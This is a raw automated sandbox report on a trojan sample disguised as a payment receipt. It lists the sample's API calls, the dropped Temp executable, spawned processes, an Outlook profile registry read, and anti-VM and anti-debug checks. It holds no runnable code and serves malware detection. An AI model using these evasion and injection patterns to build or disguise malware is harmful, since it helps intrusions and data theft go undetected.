          Source: C:\Users\user\Desktop\payment_copy2_receipt.exeCode function: 0_2_00406333
          Source: C:\Users\user\Desktop\payment_copy2_receipt.exeCode function: 0_2_00404936
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 1_2_0040B404
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 1_2_0040C14D
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 1_2_0040B900
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 1_2_0040BD18
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 1_2_0040C582
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 1_2_004167FD
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 1_2_00B80227
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 1_2_00B804D8
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_004012B0
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_0042127B
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00421AFB
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_004012A5
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00422BB0
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_0040B462
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_0040B467
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00422438
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_004044C7
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_004046E7
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_0040FE97
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A820A0
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B220A8
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A6B090
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B228EC
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B2E824
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A7A830
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B11002
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A799BF
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A74120
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A5F900
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B222AE
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B0FA2B
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A8EBB0
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B1DBD2
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B103DA
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B22B28
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A7AB40
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A6841F
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B1D466
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A82581
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A6D5E0
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B225DD
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A50D20
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B22D07
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B21D55
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B22EF7
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A76E30
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B1D616
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B21FF1
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B2DFCE
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: String function: 00A5B150 appears 72 times
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_0041E037 NtClose,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_0041E0E7 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_004012B0 EntryPoint,NtProtectVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_0041DF07 NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_0041DFB7 NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_004012A5 NtProtectVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_004014E9 NtProtectVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_0041DF01 NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A998F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A99860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A99840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A999A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A99910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A99A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A99A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A99A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A995D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A99540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A996E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A99660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A997A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A99780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A99FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A99710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A998A0 NtWriteVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A99820 NtEnumerateKey,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A9B040 NtSuspendThread,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A999D0 NtCreateProcessEx,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A99950 NtQueueApcThread,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A99A80 NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A99A10 NtQuerySection,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A9A3B0 NtGetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A99B00 NtSetValueKey,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A995F0 NtQueryInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A99520 NtWaitForSingleObject,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A9AD30 NtSetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A99560 NtWriteFile,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A996D0 NtCreateKey,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A99610 NtEnumerateValueKey,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A99670 NtQueryInformationProcess,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A99650 NtQueryValueKey,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A99730 NtQueryVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A9A710 NtOpenProcessToken,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A99760 NtOpenProcess,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A99770 NtSetInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A9A770 NtOpenThread,
          Source: payment_copy2_receipt.exeReversingLabs: Detection: 53%
          Source: payment_copy2_receipt.exeVirustotal: Detection: 38%
          Source: C:\Users\user\Desktop\payment_copy2_receipt.exeFile read: C:\Users\user\Desktop\payment_copy2_receipt.exeJump to behavior
          Source: payment_copy2_receipt.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\payment_copy2_receipt.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\payment_copy2_receipt.exe C:\Users\user\Desktop\payment_copy2_receipt.exe
          Source: C:\Users\user\Desktop\payment_copy2_receipt.exeProcess created: C:\Users\user\AppData\Local\Temp\fcvvthv.exe "C:\Users\user~1\AppData\Local\Temp\fcvvthv.exe" C:\Users\user~1\AppData\Local\Temp\abggklv.q
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeProcess created: C:\Users\user\AppData\Local\Temp\fcvvthv.exe "C:\Users\user~1\AppData\Local\Temp\fcvvthv.exe" C:\Users\user~1\AppData\Local\Temp\abggklv.q
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: C:\Users\user\Desktop\payment_copy2_receipt.exeProcess created: C:\Users\user\AppData\Local\Temp\fcvvthv.exe "C:\Users\user~1\AppData\Local\Temp\fcvvthv.exe" C:\Users\user~1\AppData\Local\Temp\abggklv.q
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeProcess created: C:\Users\user\AppData\Local\Temp\fcvvthv.exe "C:\Users\user~1\AppData\Local\Temp\fcvvthv.exe" C:\Users\user~1\AppData\Local\Temp\abggklv.q
          Source: C:\Users\user\Desktop\payment_copy2_receipt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: C:\Users\user\Desktop\payment_copy2_receipt.exeFile created: C:\Users\user~1\AppData\Local\Temp\nshAD15.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@6/5
          Source: C:\Users\user\Desktop\payment_copy2_receipt.exeCode function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Users\user\Desktop\payment_copy2_receipt.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\payment_copy2_receipt.exeCode function: 0_2_004043F5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5180:120:WilError_01
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCommand line argument: ~nA
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: Binary string: msdt.pdbGCTL source: fcvvthv.exe, 00000003.00000002.365908919.0000000002A40000.00000040.10000000.00040000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.355203577.0000000002BC2000.00000004.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.353436510.0000000002A4A000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: fcvvthv.exe, 00000001.00000003.253544929.0000000002620000.00000004.00001000.00020000.00000000.sdmp, fcvvthv.exe, 00000001.00000003.245524728.0000000002780000.00000004.00001000.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.257319352.0000000000896000.00000004.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.255559001.00000000005F7000.00000004.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000002.360183662.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000002.362321269.0000000000B4F000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000002.513574094.0000000004C2F000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000003.362154856.000000000497D000.00000004.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000002.512407542.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000003.359598987.00000000047BA000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: fcvvthv.exe, fcvvthv.exe, 00000003.00000003.257319352.0000000000896000.00000004.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.255559001.00000000005F7000.00000004.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000002.360183662.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000002.362321269.0000000000B4F000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000002.513574094.0000000004C2F000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000003.362154856.000000000497D000.00000004.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000002.512407542.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000003.359598987.00000000047BA000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: msdt.pdb source: fcvvthv.exe, 00000003.00000002.365908919.0000000002A40000.00000040.10000000.00040000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.355203577.0000000002BC2000.00000004.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.353436510.0000000002A4A000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 1_2_0040AB96 push ecx; ret
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_004210FC push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00421149 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00421152 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_004211B3 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_0042225A push dword ptr [3115C0DBh]; ret
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_0041B2F0 push esp; ret
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_004054F6 pushad ; retf 007Ah
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00409DDD push ss; retf
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_004056A2 pushfd ; retf
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00405700 pushfd ; retf
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_0041A721 push eax; retf
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_0041A739 push eax; retf
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AAD0D1 push ecx; ret
          Source: C:\Users\user\Desktop\payment_copy2_receipt.exeFile created: C:\Users\user\AppData\Local\Temp\fcvvthv.exeJump to dropped file
          Source: C:\Users\user\Desktop\payment_copy2_receipt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\payment_copy2_receipt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\payment_copy2_receipt.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msdt.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A86A60 rdtscp
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeAPI coverage: 7.2 %
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeAPI coverage: 8.5 %
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\payment_copy2_receipt.exeCode function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\payment_copy2_receipt.exeCode function: 0_2_00405FF6 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\payment_copy2_receipt.exeCode function: 0_2_00402654 FindFirstFileA,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 1_2_00410290 FindFirstFileExW,
          Source: C:\Users\user\Desktop\payment_copy2_receipt.exeAPI call chain: ExitProcess graph end node
          Source: explorer.exe, 00000004.00000000.340277436.0000000007AFF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000004.00000000.310477461.0000000007B66000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000008
          Source: explorer.exe, 00000004.00000000.335776524.0000000005FE0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.310698898.0000000007BB1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.305057483.0000000005EF4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.310698898.0000000007BB1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}E2%d
          Source: explorer.exe, 00000004.00000000.335575744.0000000005F12000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 1_2_0040A932 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 1_2_0041265A GetProcessHeap,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A86A60 rdtscp
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 1_2_0040EC98 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 1_2_0041133B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 1_2_00B80019 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 1_2_00B80005 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 1_2_00B8007A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 1_2_00B80149 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A990AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A8F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A8F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A8F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A59080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AD3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AD3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A7B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A7B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A540E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A540E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A540E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A558EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AEB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AEB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AEB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AEB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AEB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AEB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A8002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A8002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A8002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A8002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A8002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A6B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A6B02A mov eax, dword ptr fs:[00000030h]
